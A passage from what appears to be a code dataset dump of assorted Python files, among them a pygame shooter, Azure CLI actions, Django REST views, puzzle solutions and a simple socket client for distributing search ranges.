self.explosion_time = 0\n self.name = \"missle\"\n self.missle_bay = missle_bay\n self.expl_pos_x = -25\n self.expl_pos_y = -25\n #self.missle_img = pygame.image.load(missle_img)\n\n def fire(self, ship_pos_x, ship_pos_y):\n self.is_moving = True\n self.pos_x = ship_pos_x \n self.pos_y = ship_pos_y + self.missle_bay\n\n def move(self):\n if self.is_moving == True:\n if self.pos_x > self.scr_max_x+50:\n self.pos_x = -25\n self.is_moving = False\n else:\n self.pos_x += self.vel_x*self.vect_x\n pygame.draw.rect(gameDisplay, [255,0,0],\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n else:\n if self.explosion_time >0:\n self.explode()\n\n def explode(self):\n if self.explosion_time >0:\n vect = 100 - int(self.explosion_time*2)\n vect2 = self.explosion_time\n #print (vect)\n x = int(self.expl_pos_x - 0.5*vect)\n y = int(self.expl_pos_y - 0.5*vect)\n ###\n explode_img = pygame.image.load(self.imgs)\n explode_img = pygame.transform.scale(explode_img, (vect, vect))\n #expolde_img = pygame.transform.rotate(explode_img, self.pos_x)\n gameDisplay.blit(explode_img, (x,y))\n self.explosion_time -=4\n if self.explosion_time <=0:\n self.pos_x = - 25\n else:\n self.explosion_time = 50\n self.is_moving = False\n\n def collide(self, with_name,x,y):\n print (\"MISSLE COLLIDED\", with_name)\n self.expl_pos_x = x\n self.expl_pos_y = y\n self.explode()\n\nclass Blaster(Missle):\n def __init__(self):\n Missle.__init__(self,0,0,20,0,1,1,1,1,None,0,0)\n self.is_moving = False\n self.distance = 300\n\n def fire(self, pos_x, pos_y):\n self.is_moving = True\n\n def move(self):\n if self.is_moving == True:\n self.pos_x += self.vel_x\n self.distance -= self.vel_x\n if self.distance <0:\n self.is_moving = False\n else: \n pygame.draw.rect(gameDisplay, [255,255,0],\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n\n#################################################\ndef game_loop():\n\n #prototype = ( pos_x, pos_y, \n #vel_x, vel_y, \n #vect_x, vect_y, \n #dim_x, dim_y, \n #imgs) #imgs =[list of imgs] or None\n\n scr_max_x = display_width\n scr_max_y = display_height \n\n ship = Ship(5, int(scr_max_y/2), \n 9,9,\n 1,1, \n 100, 50,\n [\"ship.png\", \"ship_move.png\"],\n scr_max_x, scr_max_y)\n\n obstacle1 = Obstacle(scr_max_x+50, int(scr_max_y/2),\n 5,0,\n -1,1,\n 25,25,\n \"asteroid_2.png\",\n scr_max_x, scr_max_y)\n obstacle2 = Obstacle(scr_max_x+50, int(scr_max_y/2),\n 4,1,\n -1,1,\n 35,45,\n \"asteroid_2.png\",\n scr_max_x, scr_max_y)\n \n obstacles = [obstacle1, obstacle2]\n for obstacle in obstacles: obstacle.create()\n\n\n missle1 = Missle(ship.pos_x+int(ship.dim_x/2),ship.pos_y+int(ship.dim_y/2),15,0,1,1,7,3,\"explode.png\",scr_max_x, scr_max_y, missle_bay = 6)\n missle2 = Missle(ship.pos_x+int(ship.dim_x/2),ship.pos_y+int(ship.dim_y/2),15,0,1,1,7,3,\"explode.png\",scr_max_x, scr_max_y, missle_bay = -6)\n missles = []\n for i in range(5):\n a = deepcopy(missle1)\n b = deepcopy(missle2)\n missles.append(a)\n missles.append(b)\n missle_index = 0\n\n #game\n play_game = True\n intact = True\n \n while play_game:\n #event handler loop\n #pygame.event.get() returns list of all input per frame.\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit\n quit()\n #Key presses \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n ship.thruster(-1)\n\n elif event.key == pygame.K_DOWN:\n ship.thruster(1)\n\n elif event.key == pygame.K_SPACE:\n miss = missles[missle_index]\n miss.fire(ship.pos_x+int(ship.dim_x/2), \n ship.pos_y+int(ship.dim_y/2))\n if missle_index < 9:\n missle_index += 1\n else: \n missle_index = 0 \n # if missle1.is_moving == True:\n # if missle2.is_moving == True: \n # missle1.explode()\n # missle2.explode()\n # else:\n # missle2.fire(ship.pos_x+int(ship.dim_x/2), \n # ship.pos_y+int(ship.dim_y/2), -6)\n \n # else:\n # missle1.fire(ship.pos_x+int(ship.dim_x/2), \n # ship.pos_y+int(ship.dim_y/2), 6)\n \n #Key released \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or\\\n event.key == pygame.K_RIGHT:\n ship.thrust = 0\n if event.key == pygame.K_UP or\\\n event.key == pygame.K_DOWN:\n ship.thrust = 0\n \n\n\n\n #fill covers screen with given \n gameDisplay.fill([0,0,0]) \n #draw things\n ################################################\n ship.move()\n #missle\n for missle in missles:\n missle.move()\n\n for obstacle in obstacles: \n if obstacle.is_moving == True:\n obstacle.move()\n if obstacle.pos_x<0:\n obstacle.create()\n\n ################################################\n #COLLIDE\n friendly_objects = [[ship], missles]\n foe_objects = [obstacles]\n #all_pairs = collide.get_pairs(friendly_objects, foe_objects)\n #collide.find_collisions(all_pairs)\n collide_new.find_collisions(friendly_objects, foe_objects)\n\n pygame.display.update()\n #frames per second (60)\n clock.tick(60)\n\ngame_loop()\npygame.quit()\nquit()\n","sub_path":"nova.py","file_name":"nova.py","file_ext":"py","file_size_in_byte":10439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"406623363","text":"import torch.nn as nn\nfrom encoder import Encoder\nfrom decoder import Decoder\nimport torch\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n\n def forward(self, x):\n bottleneck = self.encoder(x)\n x = torch.squeeze(bottleneck, 1)\n x = torch.unsqueeze(x, 2)\n x = torch.unsqueeze(x, 3)\n x = self.decoder(x)\n return bottleneck, x","sub_path":"algorithm/resnet_gan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311932952","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# pylint: disable=line-too-long, too-many-statements\n\nimport argparse\n\nfrom knack.log import get_logger\nfrom knack.util import CLIError\n\nfrom azext_cosmosdb_preview.vendored_sdks.azure_mgmt_cosmosdb.models import (\n DatabaseRestoreResource,\n GremlinDatabaseRestoreResource\n)\n\nlogger = get_logger(__name__)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateDatabaseRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.databases_to_restore is None:\n namespace.databases_to_restore = []\n if not values:\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_restore_resource = DatabaseRestoreResource()\n i = 0\n for item in values:\n if i == 0:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'name':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_name = kvp[1]\n database_restore_resource.database_name = database_name\n elif i == 1:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'collections':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName collections=CollectionName1 CollectionName2 ...]')\n database_restore_resource.collection_names = []\n collection_name = kvp[1]\n database_restore_resource.collection_names.append(collection_name)\n else:\n if database_restore_resource.collection_names is None:\n database_restore_resource.collection_names = []\n database_restore_resource.collection_names.append(item)\n i += 1\n namespace.databases_to_restore.append(database_restore_resource)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateGremlinDatabaseRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.gremlin_databases_to_restore is None:\n namespace.gremlin_databases_to_restore = []\n if not values:\n # pylint: disable=line-too-long\n raise CLIError('usage error: --gremlin-databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n gremlin_database_restore_resource = GremlinDatabaseRestoreResource()\n i = 0\n for item in values:\n if i == 0:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'name':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --gremlin-databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n database_name = kvp[1]\n gremlin_database_restore_resource.database_name = database_name\n elif i == 1:\n kvp = item.split('=', 1)\n if len(kvp) != 2 or kvp[0].lower() != 'graphs':\n # pylint: disable=line-too-long\n raise CLIError('usage error: --databases-to-restore [name=DatabaseName graphs=Graph1 Graph2 ...]')\n gremlin_database_restore_resource.graph_names = []\n graph_name = kvp[1]\n gremlin_database_restore_resource.graph_names.append(graph_name)\n else:\n if gremlin_database_restore_resource.graph_names is None:\n gremlin_database_restore_resource.graph_names = []\n gremlin_database_restore_resource.graph_names.append(item)\n i += 1\n namespace.gremlin_databases_to_restore.append(gremlin_database_restore_resource)\n\n\n# pylint: disable=protected-access, too-few-public-methods\nclass CreateTableRestoreResource(argparse._AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n if namespace.tables_to_restore is None:\n namespace.tables_to_restore = []\n\n for item in values:\n namespace.tables_to_restore.append(item)\n","sub_path":"src/cosmosdb-preview/azext_cosmosdb_preview/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"83312572","text":"filepath=input(\"Enter the file path\")\nf=open(filepath,\"w\")\ninputText=\"This is starting of file\"\nwhile(inputText!=\"\"):\n inputText=input(\"Enter the text you want to write\\n\")\n f.writelines(inputText)\n f.writelines(\"\\n\")\nf=open(filepath)\nfor x in f:\n print(x)\n","sub_path":".vscode/WriteFiles.py","file_name":"WriteFiles.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"51196592","text":"\"\"\"\nCreated on Dec 20, 2017\n\n@author: nhan.nguyen\n\nVerify that user can create a pairwise without metadata.\n\"\"\"\n\nimport json\nimport pytest\nfrom indy import did, pairwise\nfrom utilities import utils, common\nfrom test_scripts.functional_tests.pairwise.pairwise_test_base \\\n import PairwiseTestBase\n\n\nclass TestCreatePairwiseWithoutMetadata(PairwiseTestBase):\n @pytest.mark.asyncio\n async def test(self):\n # 1. Create wallet.\n # 2. Open wallet.\n self.wallet_handle = await common.create_and_open_wallet_for_steps(\n self.steps, self.wallet_name, self.pool_name, credentials=self.wallet_credentials)\n\n # 3. Create and store 'my_did' by random seed.\n self.steps.add_step(\"Create and store 'my_did' by random seed\")\n (my_did, _) = await utils.perform(self.steps,\n did.create_and_store_my_did,\n self.wallet_handle, \"{}\")\n\n # 4. Create and \"their_did\".\n self.steps.add_step(\"Create 'their_did'\")\n (their_did, _) = await utils.perform(\n self.steps, did.create_and_store_my_did, self.wallet_handle,\n \"{}\")\n\n # 5. Store 'their_did'.\n self.steps.add_step(\"Store 'their_did\")\n await utils.perform(self.steps, did.store_their_did,\n self.wallet_handle,\n json.dumps({\"did\": their_did}))\n\n # 6. Create pairwise without metadata and\n # verify that there is no exception raised.\n self.steps.add_step(\"Create pairwise without metadata and \"\n \"verify that there is no exception raised\")\n await utils.perform(self.steps, pairwise.create_pairwise,\n self.wallet_handle, their_did, my_did, None,\n ignore_exception=False)\n\n # 7. Get created pairwise.\n self.steps.add_step(\"Get created pairwise\")\n pairwise_without_metadata = await utils.perform(self.steps,\n pairwise.get_pairwise,\n self.wallet_handle,\n their_did)\n\n # 8. Verify 'pairwise_without_metadata'.\n self.steps.add_step(\"Verify 'pairwise_without_metadata'\")\n expected_pairwise = utils.create_gotten_pairwise_json(my_did, None)\n utils.check(self.steps, error_message=\"Gotten pairwise mismatches\",\n condition=lambda: json.loads(pairwise_without_metadata) ==\n expected_pairwise)\n","sub_path":"test_scripts/functional_tests/pairwise/pairwise_create_pairwise_without_metadata_test.py","file_name":"pairwise_create_pairwise_without_metadata_test.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"205074898","text":"from datetime import datetime\n\nfrom rest_framework import generics\n\nfrom .models import Bosque\nfrom .api_serializers import BosqueSerializer\n\n\nclass ListaBosques(generics.ListAPIView):\n\n permission_classes = []\n serializer_class= BosqueSerializer\n\n def get_queryset(self):\n \n queryset = Bosque.objects.prefetch_related('arboles').all()\n nombre = self.request.query_params.get('nombre', None)\n tipo = self.request.query_params.get('tipo', None)\n creado = self.request.query_params.get('creado', None)\n actualizado = self.request.query_params.get('actualizado', None)\n if nombre is not None:\n queryset = queryset.filter(nombre=nombre)\n if tipo is not None:\n queryset = queryset.filter(tipo=tipo)\n if creado is not None:\n try:\n creado = datetime.strptime(creado, '%d-%m-%Y')\n queryset = queryset.filter(\n creado__day=creado.day,\n creado__month=creado.month,\n creado__year=creado.year,\n )\n except ValueError:\n pass\n if actualizado is not None:\n try:\n actualizado = datetime.strptime(actualizado, '%d-%m-%Y')\n queryset = queryset.filter(\n actualizado__day=actualizado.day,\n actualizado__month=actualizado.month,\n actualizado__year=actualizado.year,\n )\n except ValueError:\n pass\n return queryset\n\n\nclass CrearBosque(generics.CreateAPIView):\n\n permission_classes = []\n serializer_class = BosqueSerializer\n\n\nclass EditarBosque(generics.UpdateAPIView):\n\n permission_classes = []\n serializer_class = BosqueSerializer\n\n\nclass EliminarBosque(generics.DestroyAPIView):\n\n permission_classes = []\n serializer_class = BosqueSerializer\n","sub_path":"ubank/bosque/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"166527449","text":"'''\nExtractors that operate primarily or exclusively on Video stimuli.\n'''\n\nfrom featurex.stimuli.video import VideoStim\nfrom featurex.extractors import Extractor\nfrom featurex.core import Value, Event\nimport numpy as np\n\n# Optional dependencies\ntry:\n import cv2\nexcept ImportError:\n pass\n\n\nclass VideoExtractor(Extractor):\n ''' Base Video Extractor class; all subclasses can only be applied to\n video. '''\n target = VideoStim\n\n\nclass DenseOpticalFlowExtractor(VideoExtractor):\n ''' Extracts total amount of optical flow between every pair of video\n frames.\n\n '''\n\n def _extract(self, stim, show=False):\n\n events = []\n for i, f in enumerate(stim):\n\n img = f.data\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n if i == 0:\n last_frame = img\n total_flow = 0\n\n flow = cv2.calcOpticalFlowFarneback(\n last_frame, img, 0.5, 3, 15, 3, 5, 1.2, 0)\n flow = np.sqrt((flow ** 2).sum(2))\n\n if show:\n cv2.imshow('frame', flow.astype('int8'))\n cv2.waitKey(1)\n\n last_frame = img\n total_flow = flow.sum()\n\n value = Value(stim, self, {'total_flow': total_flow})\n event = Event(onset=f.onset, duration=f.duration, values=[value])\n events.append(event)\n\n return events\n","sub_path":"featurex/extractors/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"44128670","text":"from typing import Iterator\nfrom datetime import datetime\nimport stripe\nfrom ..models.customer import Customer\nfrom .base import BaseStripeRepository\n\n\nclass CustomerRepository(BaseStripeRepository):\n STRIPE_ACCESSOR = 'Customer'\n OBJECT_TYPE = Customer\n\n def list(self, *args, **kwargs) -> Iterator[Customer]:\n return super().list(*args, **kwargs)\n\n def batches(self, *args, **kwargs) -> Iterator[Customer]:\n return super().batches(*args, **kwargs)\n\n def retrieve(self, *args, **kwargs) -> Customer:\n return super().retrieve(*args, **kwargs)\n\n def create_object(self, customer_data: stripe.Customer) -> Customer:\n customer_cards = customer_data.sources.all(limit=1, object='card')\n\n if len(customer_cards.data) > 0:\n country = customer_cards.data[0].country\n else:\n country = None\n\n if 'tax_id' in customer_data.metadata:\n tax_id = customer_data.metadata['tax_id']\n else:\n tax_id = None\n\n return Customer(\n id=customer_data.id,\n metadata=customer_data.metadata,\n created=datetime.utcfromtimestamp(customer_data.created),\n name=None,\n email=customer_data.email,\n country=country,\n tax_number=tax_id\n )\n","sub_path":"sync_service/stripe/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"209558251","text":"\r\ndef swapping():\r\n file1=input(\"paset your first file :\")\r\n file2=input(\"paset your second file :\")\r\n\r\n with open(file1,\"r\") as a:\r\n data_a = a.read()\r\n with open(file2,\"r\") as b:\r\n data_b = b.read()\r\n\r\n with open(file1,\"w+\") as a:\r\n a.write(data_b)\r\n with open(file2,\"w+\") as b:\r\n b.write(data_a)\r\n\r\nswapping()","sub_path":"swapping.py","file_name":"swapping.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"62153511","text":"from django.db.backends.sqlite3.creation import DatabaseCreation\n\n\nclass ChemicaLiteCreation(DatabaseCreation):\n\n def sql_indexes_for_field(self, model, f, style):\n \"Return specific index creation SQL for the field.\"\n\n from django_chem.db.models.fields import ChemField\n\n output = super(ChemicaLiteCreation, self).sql_indexes_for_field(model,\n f,\n style)\n\n if isinstance(f, ChemField) and f.chem_index:\n #qn = self.connection.ops.quote_name\n db_table = model._meta.db_table\n\n cqn = self.connection.ops.chem_quote_name\n #qn = self.connection.ops.quote_name\n db_table = model._meta.db_table\n\n output.append(style.SQL_KEYWORD('SELECT ') +\n style.SQL_TABLE('mol_structural_index') + '(' +\n style.SQL_TABLE(cqn(db_table)) + ', ' +\n style.SQL_FIELD(cqn(f.column)) + ');')\n\n return output\n","sub_path":"django_chem/db/backends/chemicalite/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"457432342","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\n\nfrom .quantizer import LSQ\n\n\nclass QuantConv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros',\n nbits=32, symmetric=False, do_mask=False):\n super(QuantConv2d, self).__init__(in_channels, out_channels, kernel_size, stride,\n padding, dilation, groups, bias, padding_mode)\n self.step = Parameter(torch.Tensor(1))\n\n def forward(self, x):\n quantized_weight = self.weight * self.step\n return self._conv_forward(x, quantized_weight)\n\n\nclass QuantLinear(nn.Linear):\n def __init__(self, in_features, out_features, bias=True, nbits=32, symmetric=False, do_mask=False):\n super(QuantLinear, self).__init__(in_features, out_features, bias)\n self.step = Parameter(torch.Tensor(1))\n\n def forward(self, x):\n quantized_weight = self.weight * self.step\n return F.linear(x, quantized_weight, self.bias)\n","sub_path":"quantization/lsq/iqnn.py","file_name":"iqnn.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"93578832","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport json\nfrom const.constants import NOT_SET, LEVEL1, LEVEL3\nfrom protocols.vrf import VRF, ListVRF\nfrom functions.global_tools import printline\nfrom functions.verbose_mode import verbose_mode\nimport pprint\nPP = pprint.PrettyPrinter(indent=4)\n\n\ndef _arista_vrf_api_converter(\n hostname: str(),\n cmd_output,\n options={}\n) -> ListVRF:\n\n if not isinstance(cmd_output['result'][0], dict):\n cmd_output = json.loads(cmd_output['result'][0])\n else:\n cmd_output = cmd_output['result'][0]\n\n if verbose_mode(\n user_value=os.environ.get(\"NETESTS_VERBOSE\", NOT_SET),\n needed_value=LEVEL3\n ):\n printline()\n print(cmd_output)\n\n vrf_list = ListVRF(list())\n for vrf_name, facts in cmd_output.get('vrfs').items():\n if (\n facts.get('routeDistinguisher', NOT_SET) == NOT_SET or\n facts.get('routeDistinguisher', NOT_SET) == ''\n ):\n rd = NOT_SET\n else:\n rd = facts.get('routeDistinguisher', NOT_SET)\n\n vrf_list.vrf_lst.append(\n VRF(\n vrf_name=vrf_name,\n vrf_id=NOT_SET,\n vrf_type=NOT_SET,\n l3_vni=NOT_SET,\n rd=rd,\n rt_imp=NOT_SET,\n rt_exp=NOT_SET,\n imp_targ=NOT_SET,\n exp_targ=NOT_SET,\n options=options\n )\n )\n\n if verbose_mode(\n user_value=os.environ.get(\"NETESTS_VERBOSE\", NOT_SET),\n needed_value=LEVEL1\n ):\n printline()\n print(f\">>>>> {hostname}\")\n PP.pprint(vrf_list.to_json())\n\n return vrf_list\n","sub_path":"functions/vrf/arista/api/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244348198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 15:46:30 2018\n\n@author: nzx\n\"\"\"\nimport math\nfrom vector import Vector\n\nEPLISION = 1e-6\n\ndef local2World(d_local,aligned_normal):\n \"\"\"\n \t// u : X\n\t\t// n is normal: Y\n\t\t// v : Z\t\n\t\t// Sample(world coordinate)= Sample(local) * Transform matrix\n\t\t// Transform matrix:\n\t\t// |u.x\t\tu.y\t\tu.z|\t\n\t\t// |n.x\t\tn.y\t\tn.z|\t\n\t\t// |v.x\t\tv.y\t\tv.z|\t\n \n \"\"\"\n \n n = aligned_normal\n if(abs(n.x)abs(n.z)):\n# v = Vector.cross(n,Vector(0,1.0,0))\n# v.normalize()\n# u = Vector.cross(n,v)\n# u.normalize()\n# else:\n# =============================================================================\n u = Vector.cross(Vector(0,1.0,0),n)\n u.normalize()\n v = Vector.cross(u,n)\n v.normalize()\n d_world = Vector(d_local.x*u.x + d_local.y*n.x + d_local.z*v.x,\n d_local.x*u.y + d_local.y*n.y + d_local.z*v.y,\n d_local.x*u.z + d_local.y*n.z + d_local.z*v.z)\n return d_world\n \ndef transform(d_in,transform_vec):\n return d_in + transform_vec\n\n\ndef rotateY(origin,old_dir,new_dir):\n \"\"\"\n // Rotate matrix:\n\t\t// |cos\t\t0\t\tsin|\t\n\t\t// |0\t\t1\t\t0 |\t\n\t\t// |-sin\t0\t\tcos|\t\n \"\"\"\n dir = 1 if(Vector.cross(old_dir,new_dir).y >0) else -1\n cos_val = Vector.dot(old_dir,new_dir)\n sin_val = dir*math.sqrt(1-cos_val*cos_val)\n rotate_result = Vector(cos_val*origin.x + sin_val*origin.z,\n origin.y,\n -sin_val*origin.x + cos_val*origin.z)\n \n return rotate_result\n\nif __name__ == \"__main__\":\n origin = Vector(1,0,1)\n aligned = Vector(0,0,1)\n rotated = local2World(origin,aligned)\n rotated.display()","sub_path":"Script/solarEnergy/projection/globalFunc.py","file_name":"globalFunc.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491055593","text":"# PROJECT EULER PROBLEM 185 - Number Mind\n\nfrom collections import Counter\n\n# Parse guess list\ndef readGuesses():\n guess_list = []\n with open(\"p185_realGuesses.txt\") as file:\n for line in file:\n guess = line.rstrip(\" correct\\n\")\n guess = guess.split(\" ;\")\n guess[1] = int(guess[1])\n guess_list.append(guess)\n return(guess_list)\n\n# Generates string bit masks of x digits with n 0s\n# (it's a modified version of older code that was using the 0s rather than\n# the 1s; notice ln 101 of checkGuess uses the 0. I could make it use 1s\n# instead, but... meh)\ndef bitList(x,n):\n if x == 0:\n return([])\n out_str = ''\n if n == 0:\n for i in range(x):\n out_str += '1'\n return([out_str])\n out_list = []\n new_x = x-1\n new_n = n-1\n for i in range(x-(n-1)):\n i_str = out_str + '0'\n sub_bit_list = bitList(new_x,new_n)\n if not sub_bit_list:\n out_list.append(i_str)\n break\n for bit_str in sub_bit_list:\n new_str = i_str + bit_str\n out_list.append(new_str)\n out_str += '1'\n new_x -= 1\n return(out_list)\n \n\nGUESS = 0\nRIGHT = 1\n\nguess_list = readGuesses()\nNUM_OF_GUESSES = len(guess_list)\nDIGITS = len(guess_list[0][GUESS])\n\n# Recursively goes through the guesses and assumes each possible\n# combination of numbers is correct. If it finds a logical contradiction\n# it'll skip to the next assumption and continue\n# guess_num => The index of the current guess\n# guess_list => The guess list made from the .txt file of guesses\n# right_digits => The assumed correct digits, with 'x' as wildcards\n# right_so_far => How many digits are assumed correct so far\n# (rather than counting non-wildcards from right_digits)\ndef checkGuess(guess_num,guess_list,right_digits,right_so_far):\n \n # This is an end condition of the recursive checkGuess function.\n # If it has gone through all the given guesses it will see if\n # there are any wildcards ('x') left in the 'right_digits' string.\n # If there is, it'll check through the guesses again to see\n # if that digit has only one possibility left. If so then\n # the wildcard is replaced by the only possible digit remaining\n if guess_num == NUM_OF_GUESSES:\n if 'x' in right_digits:\n for d in range(DIGITS):\n if right_digits[d] == 'x':\n digit_list = [str(n) for n in range(10)]\n for n in digit_list[:]:\n for i in range(NUM_OF_GUESSES):\n if guess_list[i][GUESS][d] == n:\n digit_list.remove(n)\n break\n if len(digit_list) == 1:\n right_digits = right_digits[:d] + digit_list[0] + right_digits[d+1:]\n else:\n return(False)\n return(right_digits)\n \n check_guess = guess_list[guess_num][GUESS]\n check_right = guess_list[guess_num][RIGHT]\n #print(check_guess)\n \n # See if an assumed right digit matches a number in the next guess\n # and reduce the number of right digits in the next guess\n x_count = 0\n for d in range(DIGITS):\n if right_digits[d] != 'x':\n if right_digits[d] == check_guess[d]:\n if check_right == 0:\n return(False)\n else:\n check_right -= 1\n else:\n x_count += 1\n if x_count == 0:\n if check_right > 0:\n return(False)\n else:\n if guess_num+1 == NUM_OF_GUESSES:\n return(right_digits)\n\n # Build the next set of assumed right digits and try them\n if check_right > 0:\n check_right_so_far = right_so_far + check_right\n for bits in bitList(DIGITS-right_so_far,check_right):\n check_right_digits = ''\n next_guess = False\n for d in range(DIGITS):\n if right_digits[d] == 'x':\n b = bits[0:1]\n bits = bits[1:]\n if b == '0':\n new_digit = check_guess[d]\n for i in range(guess_num):\n if guess_list[i][GUESS][d] == new_digit:\n next_guess = True\n break\n if next_guess:\n break\n check_right_digits += new_digit\n else:\n check_right_digits += 'x'\n else:\n check_right_digits += right_digits[d]\n if next_guess:\n continue\n #print(check_right_digits)\n good_guess = checkGuess(guess_num+1,guess_list,check_right_digits,check_right_so_far)\n if good_guess:\n return(good_guess)\n return(False)\n else:\n return(checkGuess(guess_num+1,guess_list,right_digits,right_so_far))\n\nprint(guess_list)\nright_digits = ''\nfor i in range(DIGITS):\n right_digits += 'x'\nprint(checkGuess(0,guess_list,right_digits,0))\n\n","sub_path":"PE185/PE185-NumberMind.py","file_name":"PE185-NumberMind.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445526819","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nAdvent of code\nDay 25 - Part 1\n\"\"\"\n\nimport os\nimport re\nos.chdir(\"/Users/em/Documents/git-projects/adventofcode/2017/d25\")\n\nwith open(\"input.txt\", \"r\") as f:\n input = f.read()\n \nlines = input.split('\\n')\n\nstate_pattern = re.compile(r'In state ([A-F]):')\nwrite_pattern = re.compile(r'.*Write the value ([01])\\.')\nmove_pattern = re.compile(r'.*Move one slot to the (\\w+)\\.')\nnext_pattern = re.compile(r'.*Continue with state ([A-F])\\.')\nvalue_pattern = re.compile(r'.*If the current value is ([01]):')\nstep_pattern = re.compile(r'.*Perform a diagnostic checksum after (\\d+) steps\\.')\n\n\ndef create_config(lines):\n '''\n Returns a tuple (d, steps)\n d: dictionary with all the needed information about the reaction \n depending on state and pointed value.\n steps: number of step before checksum.\n '''\n d = {c: {i: {} for i in range(2)} for c in 'ABCDEF'}\n for line in lines:\n m = state_pattern.match(line)\n if m:\n current_state = m.group(1)\n m = value_pattern.match(line)\n \n if m:\n current_value = int(m.group(1))\n \n m = write_pattern.match(line)\n if m:\n d[current_state][current_value]['write'] = int(m.group(1))\n \n m = move_pattern.match(line)\n if m:\n if m.group(1)=='left':\n move=-1\n elif m.group(1)=='right':\n move=1\n else:\n raise ValueError('Incorrect move pattern')\n d[current_state][current_value]['move'] = move\n \n m = next_pattern.match(line)\n if m:\n d[current_state][current_value]['next'] = m.group(1)\n \n m = step_pattern.match(line)\n if m:\n steps = int(m.group(1))\n\n return (d, steps)\n\n\nd, steps = create_config(lines)\n\n \nassert(d['A'][1]['write']==0)\nassert(d['E'][0]['move']==-1)\nassert(d['C'][0]['next']=='B')\n\n\nt = {} # tape\np = 0 # position\nstate = 'A'\n\nfor i in range(steps):\n value = t.get(p, 0)\n t[p] = d[state][value]['write']\n p += d[state][value]['move']\n state = d[state][value]['next']\n\n\nprint('Solution of part 1: {}'.format(sum(t.values())))\n \n \n\n\n\n","sub_path":"2017/d25/d25.py","file_name":"d25.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"262208824","text":"from socket import *\nimport pickle\nimport time\n\nclientSockets= socket(AF_INET, SOCK_STREAM)\nserverNames = \"10.199.61.21\"\n\n\n\ndef createConnections(): #Creating connections with servers.\n\n\tserverPort = 12007 # ports created\n\n\tclientSockets.connect((serverNames,serverPort))\n\tprint (\"connected to host \"+ serverNames)\n\n\ndef sendToServer(limitSet): #Looping through servers and\n\t #sending the search limits 'range' to servers.\n\n\tprint (\"sending range \" + str(limitSet) +\" to host \" + 